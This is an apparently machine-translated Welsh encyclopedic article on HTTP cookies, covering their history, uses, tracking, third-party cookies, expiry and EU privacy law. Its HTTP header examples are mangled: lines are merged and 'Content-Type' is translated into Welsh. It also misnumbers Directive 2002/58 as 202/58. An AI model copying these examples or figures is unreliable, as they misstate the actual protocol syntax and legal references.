Cwci Rhyngrwyd: Beth ydyw? Diffiniad, Tarddiad, Mathau a Phreifatrwydd

Un cwci neu gwci gwe (Neu cwci, wedi'i dalfyrru fel tyst yn Québec) yn cael ei ddiffinio gan brotocol cyfathrebu HTTP fel dilyniant o wybodaeth a anfonwyd gan weinydd HTTP at gleient HTTP, y mae'r olaf yn ei ddychwelyd bob tro y cwestiynir yr un gweinydd HTTP o dan amodau penodol.

Mae'r cwci yn cyfateb i a ffeil testun bach wedi'i storio ar y derfynell defnyddiwr y Rhyngrwyd. Yn bodoli ers dros 20 mlynedd, maent yn caniatáu i ddatblygwyr gwefannau storio data defnyddwyr er mwyn hwyluso eu llywio a chaniatáu rhai swyddogaethau. Mae cwcis bob amser wedi bod yn fwy neu'n llai dadleuol oherwydd eu bod yn cynnwys gwybodaeth bersonol weddilliol y gall trydydd partïon ei hecsbloetio o bosibl.

Mae'n cael ei anfon fel pennawd HTTP gan y gweinydd gwe i'r porwr gwe sy'n ei ddychwelyd heb ei newid bob tro y mae'n cyrchu'r gweinydd. Gellir defnyddio cwci i dilysiad, sesiwn (cynhaliaeth y wladwriaeth), ac am storio gwybodaeth benodol am y defnyddiwr, megis dewisiadau safle neu gynnwys trol siopa electronig. Mae'r term cwci yn deillio o cwci hud, cysyniad adnabyddus ym maes cyfrifiadura UNIX, a ysbrydolodd syniad ac enw cwcis porwr. Mae ychydig o ddewisiadau amgen i gwcis yn bodoli, pob un â'i ddefnyddiau, manteision ac anfanteision eu hunain.

Gan eu bod yn ffeiliau testun syml, nid yw cwcis yn weithredadwy. Nid ydynt yn nac ysbïwedd na firysau, er bod cwcis o rai safleoedd yn cael eu canfod gan lawer o feddalwedd gwrth-firws oherwydd eu bod yn caniatáu i ddefnyddwyr gael eu holrhain pan fyddant yn ymweld â sawl safle. 

Mae'r rhan fwyaf o borwyr modern yn caniatáu i ddefnyddwyr wneud hynny penderfynu a ddylid derbyn neu wrthod cwcis. Gall defnyddwyr hefyd dewis pa mor hir y caiff cwcis eu storio. Fodd bynnag, mae gwrthod cwcis yn llwyr yn golygu na ellir defnyddio rhai gwefannau. Er enghraifft, cadwch gertiau siopa neu wefannau sydd angen mewngofnodi gan ddefnyddio tystlythyrau (enw defnyddiwr a chyfrinair).

hanesyddol

y term cwci yn deillio o'r term Saesneg cwci hud, sef pecyn o ddata y mae rhaglen yn ei dderbyn ac yn ei ddychwelyd heb ei newid. Roedd cwcis eisoes yn cael eu defnyddio mewn TG pryd Lou Montulli wedi cael y syniad i'w defnyddio mewn cyfathrebiadau gwe ym mis Mehefin 1994. Bryd hynny, roedd yn cael ei gyflogi gan Netscape Communications, a oedd wedi datblygu rhaglen e-fasnach ar gyfer cleient. Rhoddodd cwcis ateb i broblem dibynadwyedd gweithrediad trol siopa rhithwir siop.

Ysgrifennodd John Giannandrea a Lou Montulli fanyleb cwci cyntaf Netscape yr un flwyddyn. Fersiwn 0.9 beta o Mosaic Netscape, a ryddhawyd ar Hydref 13, 1994, integredig technoleg cwci (gweler y post). Y defnydd cyntaf (anarbrofol) o gwcis oedd penderfynu a oedd ymwelwyr â gwefan Netscape wedi ymweld â'r safle o'r blaen. Ffeiliodd Montulli gais am batent ar gyfer technoleg cwci ym 1995, a rhoddwyd patent yr Unol Daleithiau 5774670. a roddwyd yn 1998.

Ar ôl cael eu gweithredu yn Netscape 0.9 beta ym 1994, cafodd cwcis eu hintegreiddio i Internet Explorer 2, a ryddhawyd ym mis Hydref 1995.

Nid yw cyflwyno cwcis wedi bod yn hysbys iawn i'r cyhoedd eto. Yn benodol, derbyniwyd cwcis yn ddiofyn yng ngosodiadau’r porwr, ac ni hysbyswyd defnyddwyr o’u presenoldeb. Roedd rhai pobl yn ymwybodol o fodolaeth cwcis tua chwarter cyntaf 1995, ond dim ond ar ôl i'r Financial Times gyhoeddi erthygl ar Chwefror 12, 1996 y daeth y cyhoedd yn gyffredinol i'w bodolaeth. Yn yr un flwyddyn, cafodd cwcis lawer o sylw yn y cyfryngau oherwydd ymyriadau preifatrwydd posibl. Trafodwyd pwnc cwcis mewn dau ymgynghoriad gan Gomisiwn Masnach Ffederal America yn 1996 a 1997.

Roedd y gwaith o ddatblygu'r fanyleb cwcis swyddogol eisoes ar y gweill. Cynhaliwyd trafodaethau cyntaf y fanyleb swyddogol ym mis Ebrill 1995 ar restr bostio www-talk. Ffurfiwyd gweithgor IETF arbennig. Cynigiwyd dau gynnig amgen ar gyfer cyflwyno trafodion gwladwriaethol i HTTP gan Brian Behlendorf a David Kristol yn y drefn honno, ond penderfynodd y grŵp, dan arweiniad Kristol ei hun, ddefnyddio manyleb Netscape fel man cychwyn. Ym mis Chwefror 1996, penderfynodd y gweithgor fod cwcis trydydd parti yn fygythiad sylweddol i breifatrwydd. Yn y pen draw, cyhoeddwyd y fanyleb a gynhyrchwyd gan y grŵp fel RFC 2109.

O ddiwedd 2014, gwelwn faner am gwcis ar lawer o wefannau. Mae o leiaf un estyniad porwr sy'n caniatáu i'r baner heb ei harddangos.

Mathau o Gwcis a Defnydd

Rheoli sesiwn

Gellir defnyddio cwcis i gadw data defnyddwyr yn ystod llywio, ond hefyd ar draws ymweliadau lluosog. Cyflwynwyd cwcis i ddarparu modd o weithredu cartiau siopa electronig, dyfais rithwir lle gall y defnyddiwr gronni'r eitemau y mae am eu prynu wrth bori'r wefan.

Y dyddiau hyn, mae apps fel troliau siopa yn lle hynny yn storio'r rhestr o eitemau mewn cronfa ddata ar weinydd, sy'n well; na'u harbed yn y cwci ei hun. Mae gweinydd y we yn anfon cwci sy'n cynnwys ID sesiwn unigryw. Yna mae'r porwr gwe yn dychwelyd yr ID sesiwn hwn ar bob cais dilynol ac mae'r eitemau yn y fasged yn cael eu cadw ac yn gysylltiedig â'r un ID sesiwn unigryw hwn.

Mae defnyddio cwcis yn aml yn ddefnyddiol ar gyfer mewngofnodi i wefan gan ddefnyddio manylion adnabod. Yn fyr, mae gweinydd y we yn anfon cwci yn gyntaf sy'n cynnwys ID sesiwn unigryw. Yna mae defnyddwyr yn darparu eu tystlythyrau (enw defnyddiwr a chyfrinair fel arfer). Yna mae'r cymhwysiad gwe yn dilysu'r sesiwn ac yn caniatáu i'r defnyddiwr gael mynediad i'r gwasanaeth.

personoli

Gellir defnyddio cwcis i gofio gwybodaeth am ddefnyddiwr gwefan, er mwyn dangos cynnwys priodol iddo yn y dyfodol. Er enghraifft, gall gweinydd gwe anfon cwci sy'n cynnwys yr enw defnyddiwr olaf a ddefnyddiwyd i fewngofnodi i'r wefan honno, fel bod modd llenwi'r enw defnyddiwr ymlaen llaw ar ymweliadau yn y dyfodol.

Mae llawer o wefannau yn defnyddio cwcis ar gyfer personoli yn seiliedig ar ddewisiadau defnyddwyr. Mae defnyddwyr yn dewis eu hoffterau mewn ffurf ac yn cyflwyno'r rhain i'r gweinydd. Mae'r gweinydd yn amgodio'r dewisiadau mewn cwci ac yn ei anfon yn ôl i'r porwr. Wedi hynny, bob tro mae'r defnyddiwr yn cyrchu tudalen o'r wefan hon, mae'r porwr yn dychwelyd y cwci ac felly'r rhestr o ddewisiadau; gall y gweinydd wedyn addasu'r dudalen yn unol â dewisiadau'r defnyddiwr. Er enghraifft, mae gwefan Wikipedia yn caniatáu i'w defnyddwyr ddewis croen y wefan sydd orau ganddynt. Mae peiriant chwilio Google yn caniatáu i'w ddefnyddwyr (hyd yn oed os nad ydynt wedi'u cofrestru) ddewis nifer y canlyniadau y maent am eu gweld ar bob tudalen canlyniadau.

Olrhain

Defnyddir cwcis olrhain i olrhain arferion pori defnyddwyr y rhyngrwyd. Gellir gwneud hyn yn rhannol hefyd trwy ddefnyddio cyfeiriad IP y cyfrifiadur sy'n gwneud cais am dudalen neu drwy ddefnyddio'r pennawd HTTP 'cyfeirydd' y mae'r cleient yn ei anfon gyda phob cais, ond mae cwcis yn caniatáu mwy o fanylder. Gellir gwneud hyn fel yn yr enghraifft ganlynol:

1. Os yw'r defnyddiwr yn galw tudalen ar wefan, ac nad yw'r cais yn cynnwys cwci, mae'r gweinydd yn cymryd yn ganiataol mai dyma'r dudalen gyntaf i'r defnyddiwr ymweld â hi. Yna mae'r gweinydd yn creu llinyn ar hap ac yn ei anfon i'r porwr ynghyd â'r dudalen y gofynnwyd amdani.
2. O'r eiliad hon, bydd y porwr yn anfon y cwci yn awtomatig bob tro y bydd tudalen newydd o'r wefan yn cael ei galw. Bydd y gweinydd yn anfon y dudalen fel arfer, ond bydd hefyd yn cofnodi URL y dudalen a elwir, dyddiad, amser y cais a'r cwci mewn ffeil log.

Wrth edrych ar y ffeil log, yna mae'n bosibl gweld pa dudalennau mae'r defnyddiwr wedi ymweld â nhw ac ym mha drefn. Er enghraifft, os yw'r ffeil yn cynnwys ychydig o geisiadau a wnaed gan ddefnyddio'r cwci id=abc, gall hyn sefydlu bod yr holl geisiadau hyn yn dod gan yr un defnyddiwr. Mae'r URL y gofynnwyd amdano, y dyddiad a'r amser sy'n gysylltiedig â'r ceisiadau yn caniatáu olrhain pori'r defnyddiwr.

Mae cwcis trydydd parti a ffaglau gwe, a esbonnir isod, hefyd yn galluogi olrhain ar draws gwahanol wefannau. Yn gyffredinol, defnyddir tracio un safle at ddibenion ystadegol. Mewn cyferbyniad, mae olrhain ar draws gwahanol wefannau gan ddefnyddio cwcis trydydd parti yn cael ei ddefnyddio'n gyffredinol gan gwmnïau hysbysebu i gynhyrchu proffiliau defnyddwyr dienw (a ddefnyddir wedyn i benderfynu pa hysbysebion y dylid eu dangos i'r defnyddiwr yn ogystal ag anfon e-byst sy'n cyfateb i'r hysbysebion hyn ato - SPAM ).

Mae olrhain cwcis yn risg o dresmasu ar breifatrwydd defnyddwyr ond gellir eu dileu yn hawdd. Mae'r rhan fwyaf o borwyr modern yn cynnwys opsiwn i ddileu cwcis parhaus yn awtomatig wrth gau'r rhaglen.

Cwcis trydydd parti

Gall delweddau a gwrthrychau eraill a gynhwysir mewn tudalen we fod ar weinyddion gwahanol i'r un sy'n cynnal y dudalen. I arddangos y dudalen, mae'r porwr yn lawrlwytho'r holl wrthrychau hyn. Mae'r rhan fwyaf o wefannau yn cynnwys gwybodaeth o wahanol ffynonellau. Er enghraifft, os teipiwch www.example.com i’ch porwr, yn aml bydd gwrthrychau neu hysbysebion ar ran o’r dudalen sy’n dod o ffynonellau gwahanol, h.y. o barth gwahanol i www.example.com. Cwcis parti "cyntaf" yw cwcis sy'n cael eu gosod gan y parth a restrir ym mar cyfeiriad y porwr. Mae cwcis trydydd parti yn cael eu gosod gan un o'r gwrthrychau tudalen sy'n dod o barth gwahanol.

Yn ddiofyn, mae porwyr fel Mozilla Firefox, Microsoft Internet Explorer ac Opera yn derbyn cwcis trydydd parti, ond gall defnyddwyr newid y gosodiadau yn opsiynau porwr i'w rhwystro. Nid oes unrhyw risg diogelwch cynhenid ​​​​mewn cwcis trydydd parti sy'n galluogi ymarferoldeb gwe, fodd bynnag fe'u defnyddir hefyd i olrhain defnyddwyr. o safle i safle.

Gall offer fel Ghostery sydd ar gael ar gyfer pob porwr gan gynnwys Google Chrome rwystro cyfnewidiadau rhwng trydydd parti.

Gweithredu

Darnau bach o ddata a anfonir gan y gweinydd gwe i'r porwr yw cwcis. Mae'r porwr yn eu dychwelyd heb eu newid i'r gweinydd, gan gyflwyno cyflwr (cof digwyddiadau'r gorffennol) i'r trafodiad HTTP sydd fel arall yn ddi-wladwriaeth. Heb gwcis, mae pob adalw o dudalen we neu gydran o dudalen we yn ddigwyddiad ynysig, yn annibynnol ar geisiadau eraill a wneir i'r un wefan. Yn ogystal â gallu cael eu gosod gan y gweinydd gwe, gellir gosod cwcis hefyd trwy sgriptio ieithoedd fel JavaScript, os yw'r porwr yn eu cefnogi a'u hawdurdodi.

Mae'r fanyleb cwci swyddogol yn awgrymu y dylai porwyr allu cadw ac ail-anfon isafswm o gwcis. Yn benodol, dylai porwr allu storio o leiaf 300 cwci o bedwar cilobeit yr un, ac o leiaf 20 cwci ar gyfer un gweinydd neu barth.

Yn ôl adran 3.1 o RFC 2965, mae enwau cwcis yn ansensitif i achosion.

Gall cwci nodi'r dyddiad y daw i ben, ac os felly bydd y cwci yn cael ei ddileu ar y dyddiad hwn. Os nad yw'r cwci yn nodi dyddiad dod i ben, caiff y cwci ei ddileu cyn gynted ag y bydd y defnyddiwr yn gadael ei borwr. Felly, mae nodi dyddiad dod i ben yn ffordd o wneud i'r cwci oroesi trwy sesiynau lluosog. Am y rheswm hwn, dywedir bod cwcis â dyddiad dod i ben parhaus. Cymhwysiad enghreifftiol: gallai safle manwerthu ddefnyddio cwcis parhaus i gofnodi’r eitemau y mae defnyddwyr wedi’u gosod yn eu trol siopa (mewn gwirionedd, gallai’r cwci gyfeirio at gofnod sydd wedi’i gadw mewn cronfa ddata ar y safle gwerthu, ac nid yn eich cyfrifiadur) . Trwy hyn, os bydd defnyddwyr yn gadael eu porwr heb brynu ac yn dychwelyd ato yn ddiweddarach, byddant yn gallu dod o hyd i'r eitemau yn y drol eto. Pe na bai'r cwcis hyn yn rhoi dyddiad dod i ben, byddent yn dod i ben pan fyddai'r porwr ar gau, a byddai'r wybodaeth am gynnwys y fasged yn cael ei cholli.

Gellir cyfyngu cwmpas cwcis i barth, is-barth neu lwybr penodol ar y gweinydd a'u creodd.

Creu cwci

Mae trosglwyddo tudalennau gwe yn cael ei wneud gan ddefnyddio'r Protocol Trosglwyddo HyperText (HTTP). Trwy anwybyddu cwcis, mae porwyr yn galw tudalen o weinyddion gwe trwy anfon testun byr o'r enw atynt yn gyffredinol Cais HTTP. Er enghraifft, i gael mynediad i’r dudalen www.example.org/index.html, mae porwyr yn cysylltu â’r gweinydd www.example.org ac yn anfon cais sy’n edrych fel hyn:

	GET /index.html HTTP/1.1Host: www.example.org
llywiwr	→	serveur

Mae'r gweinydd yn ymateb trwy anfon y dudalen y gofynnwyd amdani, gyda thestun tebyg o'i flaen, gyda'r cyfan yn cael ei alw Ymateb HTTP. Gall y pecyn hwn gynnwys llinellau sy'n cyfarwyddo'r porwr i storio cwcis:

	HTTP/1.1 200 OKCynnwys-math: text/htmlSet-Cookie: enw=gwerth (tudalen HTML)
llywiwr	←	serveur

Dim ond os yw'r gweinydd eisiau i'r porwr storio cwci y mae'r gweinydd yn anfon y llinell Set-Cookie. Mae Set-Cookie yn gais i'r porwr storio'r llinyn name=value a'i ddychwelyd ym mhob cais yn y dyfodol i'r gweinydd. Os yw'r porwr yn cefnogi cwcis a bod cwcis wedi'u galluogi yn opsiynau'r porwr, bydd y cwci yn cael ei gynnwys ym mhob cais dilynol a wneir i'r un gweinydd. Er enghraifft, mae'r porwr yn galw'r dudalen yn www.example.org/news.html trwy anfon y cais canlynol i'r gweinydd www.example.org:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
llywiwr	→	serveur

Mae hwn yn gais am dudalen arall o'r un gweinydd, ac mae'n wahanol i'r cyntaf uchod oherwydd ei fod yn cynnwys llinyn a anfonodd y gweinydd i'r porwr yn flaenorol. Diolch i hyn, mae'r gweinydd yn gwybod bod y cais hwn yn gysylltiedig â'r un blaenorol. Mae'r gweinydd yn ymateb trwy anfon y dudalen a elwir, a hefyd trwy ychwanegu cwcis eraill ati.

Gall y gweinydd newid gwerth y cwci trwy anfon llinell newydd Set-Cookie: name=new_value mewn ymateb i'r dudalen a elwir. Yna mae'r porwr yn disodli'r hen werth gyda'r un newydd.

Mae'r llinell Set-Cookie fel arfer yn cael ei chreu gan raglen CGI neu iaith sgriptio arall, nid gan y gweinydd HTTP. Bydd y gweinydd HTTP (enghraifft: Apache) ond yn trosglwyddo canlyniad y rhaglen (dogfen gyda'r pennawd sy'n cynnwys y cwcis o'i blaen) i'r porwr.

Gellir gosod cwcis hefyd gan JavaScript neu ieithoedd tebyg eraill sy'n rhedeg yn y porwr, h.y. ar ochr y cleient yn hytrach nag ochr y gweinydd. Yn JavaScript, defnyddir y gwrthrych document.cookie at y diben hwn. Er enghraifft, mae'r datganiad document.cookie = "tymheredd = 20" yn creu cwci o'r enw "tymheredd" ac sydd â gwerth o 20.

Nodweddion cwci

Yn ogystal â’r pâr enw/gwerth, gall cwci hefyd gynnwys dyddiad dod i ben, llwybr, enw parth a’r math o gysylltiad a fwriedir, h.y. arferol neu wedi’i amgryptio. Mae RFC 2965 hefyd yn diffinio bod yn rhaid i gwcis gael rhif fersiwn gorfodol, ond caiff hwn ei hepgor yn gyffredinol. Mae'r rhannau data hyn yn dilyn yr enw = pâr_value_new ac yn cael eu gwahanu gan hanner colon. Er enghraifft, gall y gweinydd greu cwci trwy anfon llinell Set-Cookie: name=new_value; dod i ben = dyddiad; llwybr=/; parth=.example.org.

Cwci yn dod i ben

Mae cwcis yn dod i ben ac yna nid ydynt yn cael eu hanfon gan y porwr i'r gweinydd yn y sefyllfaoedd canlynol:

• Pan fydd y porwr ar gau, os nad yw'r cwci yn barhaus.
• Pan fydd dyddiad dod i ben y cwci wedi mynd heibio.
• Pan fydd dyddiad dod i ben y cwci yn cael ei newid (gan y gweinydd neu'r sgript) i ddyddiad yn y gorffennol.
• Pan fydd y porwr yn dileu'r cwci ar gais y defnyddiwr.

Mae'r drydedd sefyllfa yn caniatáu i weinyddion neu sgriptiau ddileu cwci yn benodol. Sylwch ei bod hi'n bosibl gyda phorwr gwe Google Chrome wybod dyddiad dod i ben cwci penodol trwy gyrchu'r gosodiadau cynnwys. Mae’n bosibl iawn y bydd cwci sy’n cael ei gadw ar gyfrifiadur yn aros yno am sawl degawd os na chymerir trefn i’w ddileu.

Stereoteipiau

Ers eu cyflwyno ar y Rhyngrwyd, mae llawer o syniadau am gwcis wedi cylchredeg ar y Rhyngrwyd ac yn y cyfryngau. Ym 1998, penderfynodd CIAC, tîm monitro digwyddiadau cyfrifiadurol Adran Ynni’r Unol Daleithiau, fod gwendidau diogelwch cwci “yn y bôn ddim yn bodoli” ac eglurodd “gwybodaeth am darddiad eich ymweliadau a manylion y tudalennau gwe yr ydych wedi ymweld â nhw. yn bodoli eisoes yn ffeiliau log y gweinyddwyr gwe”. Yn 2005, cyhoeddodd Jupiter Research ganlyniadau astudiaeth, lle ystyriodd canran sylweddol o ymatebwyr y datganiadau canlynol:

• Mae cwcis yn debyg firws, maent yn heintio gyriannau caled defnyddwyr.
• Cwcis cynhyrchu pop-up.
• Defnyddir cwcis i anfon sbam.
• Defnyddir cwcis ar gyfer hysbysebu yn unig.

Ni all cwcis ddileu na darllen gwybodaeth o gyfrifiadur y defnyddiwr. Fodd bynnag, mae cwcis yn ei gwneud hi'n bosibl canfod y tudalennau gwe y mae defnyddiwr yn ymweld â nhw ar wefan benodol neu set o wefannau. Gellir casglu'r wybodaeth hon mewn proffil defnyddiwr y gellir ei ddefnyddio neu ei ailwerthu i drydydd partïon, a all achosi problemau preifatrwydd difrifol. Mae rhai proffiliau yn ddienw, yn yr ystyr nad ydynt yn cynnwys unrhyw wybodaeth bersonol, ond gall hyd yn oed proffiliau o'r fath fod yn amheus.

Yn ôl yr un astudiaeth, nid yw canran fawr o ddefnyddwyr y Rhyngrwyd yn gwybod sut i ddileu cwcis. Un o'r rhesymau pam nad yw pobl yn ymddiried mewn cwcis yw bod rhai gwefannau wedi cam-drin yr agwedd o adnabod cwcis yn bersonol ac wedi rhannu'r wybodaeth hon â ffynonellau eraill. Daw canran fawr o hysbysebu wedi'i dargedu ac e-bost digymell, a ystyrir yn sbam, o wybodaeth a gasglwyd o olrhain cwcis.

Gosodiadau porwr

Mae'r rhan fwyaf o borwyr yn cefnogi cwcis ac yn caniatáu i'r defnyddiwr eu hanalluogi. Yr opsiynau mwyaf cyffredin yw:

• Galluogi neu analluogi cwcis yn gyfan gwbl, fel eu bod yn cael eu derbyn neu eu rhwystro'n gyson.
• Caniatewch i'r defnyddiwr weld y cwcis gweithredol ar dudalen benodol, trwy roi javascript: alert(document.cookie) ym mar cyfeiriad y porwr. Mae rhai porwyr yn ymgorffori rheolwr cwcis ar gyfer y defnyddiwr sy'n gallu gweld a dileu'n ddetholus cwcis sy'n cael eu storio ar hyn o bryd gan y porwr.

Mae'r rhan fwyaf o borwyr hefyd yn caniatáu dileu data personol yn llawn sy'n cynnwys cwcis. Mae modiwlau ychwanegol i reoli caniatâd cwcis yn bodoli hefyd.

Preifatrwydd a Chwcis Trydydd Parti

Yn yr enghraifft ffug hon, mae cwmni hysbysebu wedi gosod baneri ar ddwy wefan. Trwy gynnal y baneri ar ei weinyddion a defnyddio cwcis trydydd parti, mae'r cwmni hysbysebu yn gallu olrhain llywio'r defnyddiwr trwy'r ddau wefan hyn.

Mae gan gwcis oblygiadau pwysig i breifatrwydd ac anhysbysrwydd defnyddwyr y we. Er mai dim ond i'r gweinydd a'u gosododd neu i weinydd sy'n perthyn i'r un parth Rhyngrwyd y caiff cwcis eu hanfon yn ôl, gall tudalen we gynnwys delweddau neu gydrannau eraill sydd wedi'u storio ar weinyddion sy'n perthyn i barthau eraill. Gelwir y cwcis sy'n cael eu gosod yn ystod adferiad y cydrannau allanol hyn cwcis trydydd parti. Mae hyn yn cynnwys cwcis o ffenestri naid diangen.

Mae cwmnïau hysbysebu yn defnyddio cwcis trydydd parti i olrhain defnyddwyr ar draws y gwahanol wefannau y maent yn ymweld â nhw. Yn benodol, gall cwmni hysbysebu olrhain defnyddiwr ar draws pob tudalen lle mae wedi gosod delweddau hysbysebu neu bicseli olrhain. Mae gwybodaeth am y tudalennau y mae'r defnyddiwr yn ymweld â nhw yn galluogi'r cwmni hysbysebu i dargedu dewisiadau hysbysebu'r defnyddiwr.

Mae'r gallu i adeiladu proffil defnyddiwr yn cael ei ystyried gan rai yn ymosodiad preifatrwydd, yn enwedig pan fydd olrhain yn cael ei wneud ar draws gwahanol barthau gan ddefnyddio cwcis trydydd parti. Am y rheswm hwn, mae gan rai gwledydd ddeddfwriaeth cwcis.

Gweithredodd llywodraeth yr Unol Daleithiau reolau llym ar leoli cwcis yn 2000, ar ôl datgelu bod Swyddfa Polisi Cyffuriau'r Tŷ Gwyn yn defnyddio cwcis i olrhain cyfrifiaduron defnyddwyr sy'n edrych ar hysbysebion cyffuriau ar-lein. Yn 2002, darganfu'r gweithredwr preifatrwydd Daniel Brandt fod y CIA yn gadael cwcis parhaus ar gyfrifiaduron a oedd wedi ymweld â'i wefannau. Ar ôl cael gwybod am y toriad hwn, datganodd y CIA na chafodd y cwcis hyn eu hanfon yn fwriadol a rhoddodd y gorau i'w gosod. Ar 25 Rhagfyr, 2005, darganfu Brandt fod yr Asiantaeth Diogelwch Cenedlaethol (NSA) wedi gadael dau gwci parhaus ar gyfrifiaduron ymwelwyr oherwydd diweddariad meddalwedd. Ar ôl cael ei hysbysu, analluogodd yr NSA cwcis ar unwaith.

Yn y Deyrnas Unedig, mae'r Cyfraith cwcis “, a ddaeth i rym ar Fai 25, 2012, yn gorfodi'r gwefannau i ddatgan eu bwriadau, gan ganiatáu i ddefnyddwyr ddewis a ydynt am adael olion eu taith ar y Rhyngrwyd ai peidio. Felly gellir eu hamddiffyn rhag targedu hysbysebion. Fodd bynnag, yn ôl The Guardian, nid yw caniatâd defnyddwyr y Rhyngrwyd o reidrwydd yn amlwg; newidiadau wedi'u gwneud i delerau caniatâd defnyddiwr, gan ei wneud felly ymhlyg.

Cyfarwyddeb 2002/58 ar breifatrwydd

Mae Cyfarwyddeb 202/58 preifatrwydd a chyfathrebu electronig, yn cynnwys rheolau ar ddefnyddio cwcis. Yn benodol, mae erthygl 5, paragraff 3 o'r gyfarwyddeb hon yn ei gwneud yn ofynnol i storio data (fel cwcis) yng nghyfrifiadur y defnyddiwr dim ond:

• bod y defnyddiwr yn cael gwybod sut y defnyddir y data;
• mae'r defnyddiwr yn cael yr opsiwn o wrthod y gweithrediad storio hwn. Fodd bynnag, mae'r erthygl hon hefyd yn nodi bod storio data am resymau technegol wedi'i eithrio o'r gyfraith hon.

Roedd y gyfarwyddeb i fod i gael ei rhoi ar waith o fis Hydref 2003, fodd bynnag, dim ond yn amherffaith iawn y cafodd y gyfarwyddeb ei rhoi ar waith yn ôl adroddiad ym mis Rhagfyr 2004, a oedd hefyd yn nodi nad oedd rhai Aelod-wladwriaethau (Slofacia, Latfia, Gwlad Groeg, Gwlad Belg a Lwcsembwrg) eto wedi trosi'r gyfarwyddeb i gyfraith ddomestig.

Yn ôl barn y G29 yn 2010, mae'r gyfarwyddeb hon, sy'n benodol yn amodau'r defnydd o gwcis at ddibenion hysbysebu ymddygiadol, ar ganiatâd penodol defnyddiwr y Rhyngrwyd yn parhau i gael ei gymhwyso'n wael iawn. Mewn gwirionedd, mae'r rhan fwyaf o safleoedd yn gwneud hynny mewn ffordd nad yw'n cydymffurfio â'r gyfarwyddeb, trwy gyfyngu eu hunain i "faner" syml sy'n hysbysu'r defnydd o "cwcis" heb roi gwybodaeth am y defnyddiau, heb wahaniaethu rhwng cwcis "technegol". "olrhain" cwcis, nac i gynnig dewis gwirioneddol i'r defnyddiwr sy'n dymuno cynnal cwcis technegol (fel cwcis rheoli trol siopa) a gwrthod "olrhain" cwcis. Mewn gwirionedd, nid yw llawer o wefannau yn gweithredu'n gywir os gwrthodir cwcis, nad yw'n cydymffurfio â chyfarwyddeb 2002/58 na chyfarwyddeb 95/46 (Diogelu data personol).

Cyfarwyddeb 2009/136 / CE

Mae'r deunydd hwn wedi'i ddiweddaru gan Gyfarwyddeb 2009/136/EC dyddiedig 25 Tachwedd, 2009 sy'n nodi y caniateir “storio gwybodaeth, neu gael mynediad at wybodaeth sydd eisoes wedi'i storio, yn offer terfynell tanysgrifiwr neu ddefnyddiwr ar yr amod bod y tanysgrifiwr neu ddefnyddiwr wedi rhoi ei ganiatâd, ar ôl cael, yn unol â Chyfarwyddeb 95/46/EC, wybodaeth glir a chyflawn, rhwng eraill, am ddibenion y prosesu”. Mae'r gyfarwyddeb newydd felly yn cryfhau'r rhwymedigaethau cyn gosod cwcis ar gyfrifiadur defnyddiwr y Rhyngrwyd.

Yn ystyriaethau rhagarweiniol y gyfarwyddeb, fodd bynnag, mae'r deddfwr Ewropeaidd yn nodi: "Pan fo hynny'n dechnegol bosibl ac effeithiol, yn unol â darpariaethau perthnasol Cyfarwyddeb 95/46/EC, gellir mynegi caniatâd y defnyddiwr mewn perthynas â'r prosesu trwy'r defnyddio gosodiadau priodol porwr neu raglen arall”. Ond mewn gwirionedd, nid oes unrhyw borwr hyd yma yn ei gwneud hi'n bosibl datgysylltu'r cwcis technegol hanfodol oddi wrth y rhai dewisol y dylid eu gadael i ddewis y defnyddiwr.

Troswyd y gyfarwyddeb newydd hon gan ASau Gwlad Belg ym mis Gorffennaf 2012. Mae astudiaeth yn 2014 yn dangos bod hyd yn oed ASau yn ei chael yn anodd gwneud cais cyfyngiadau'r gyfarwyddeb.

P3P

Mae'r fanyleb P3P yn cynnwys y gallu i weinydd ddatgan polisi preifatrwydd, sy'n diffinio pa fath o wybodaeth y mae'n ei chasglu ac at ba ddiben. Mae'r polisïau hyn yn cynnwys (ond heb fod yn gyfyngedig i) y defnydd o wybodaeth a gesglir gan ddefnyddio cwcis. Yn ôl diffiniadau P3P, gall porwr dderbyn neu wrthod cwcis trwy gymharu'r polisïau preifatrwydd â dewisiadau'r defnyddiwr neu trwy ofyn i'r defnyddiwr, gan gyflwyno'r datganiad preifatrwydd polisi preifatrwydd a ddatganwyd gan y gweinydd.

Mae llawer o borwyr, gan gynnwys fersiynau Apple Safari a Microsoft Internet Explorer 6 a 7, yn cefnogi P3P sy'n caniatáu i'r porwr benderfynu a ddylid derbyn storfa cwci trydydd parti. Mae porwr Opera yn caniatáu i ddefnyddwyr wrthod cwcis trydydd parti a chreu proffil diogelwch byd-eang a phenodol ar gyfer parthau Rhyngrwyd. Gostyngodd fersiwn 2 Mozilla Firefox gefnogaeth P3P ond fe'i hailosodwyd yn fersiwn 3.

Gall y rhan fwyaf o borwyr rwystro cwcis trydydd parti i gynyddu preifatrwydd a lleihau olrhain hysbysebion, heb effeithio'n negyddol ar brofiad gwe'r defnyddiwr. Mae llawer o asiantaethau hysbysebu yn cynnig opsiwn dewis allan i hysbysebu wedi'i dargedu, trwy sefydlu cwci generig yn y porwr sy'n dadactifadu'r targedu hwn, ond nid yw datrysiad o'r fath yn ymarferol effeithiol, pan gaiff ei barchu, oherwydd bod y cwci generig hwn yn cael ei ddileu cyn gynted ag y bydd y defnyddiwr yn dileu'r cwcis hyn sy'n canslo'r opsiwn optio allan penderfyniad.

Anfanteision cwcis

Yn ogystal â materion preifatrwydd, mae gan gwcis hefyd rai anfanteision technegol. Yn benodol, nid ydynt bob amser yn nodi defnyddwyr yn gywir, gallant arafu perfformiad y safle pan mewn niferoedd mawr, gellir eu defnyddio ar gyfer ymosodiadau diogelwch, ac maent yn gwrthdaro â throsglwyddo cyflwr cynrychioliadol, arddull pensaernïol y meddalwedd.

Adnabod anfanwl

Os defnyddir mwy nag un porwr ar gyfrifiadur, mae uned storio ar wahân ar gyfer cwcis ym mhob un ohonynt bob amser. Felly nid yw cwcis yn adnabod person, ond yn hytrach y cyfuniad o gyfrif defnyddiwr, cyfrifiadur, a phorwr gwe. Felly, gall unrhyw un ddefnyddio'r cyfrifon hyn, cyfrifiaduron, neu borwyr sydd â'r ystod eang o gwcis. Yn yr un modd, nid yw cwcis yn gwahaniaethu rhwng defnyddwyr lluosog sy'n rhannu'r un cyfrif defnyddiwr, cyfrifiadur, a porwr, megis mewn “caffis rhyngrwyd” neu unrhyw le sy'n rhoi mynediad am ddim i adnoddau cyfrifiadurol.

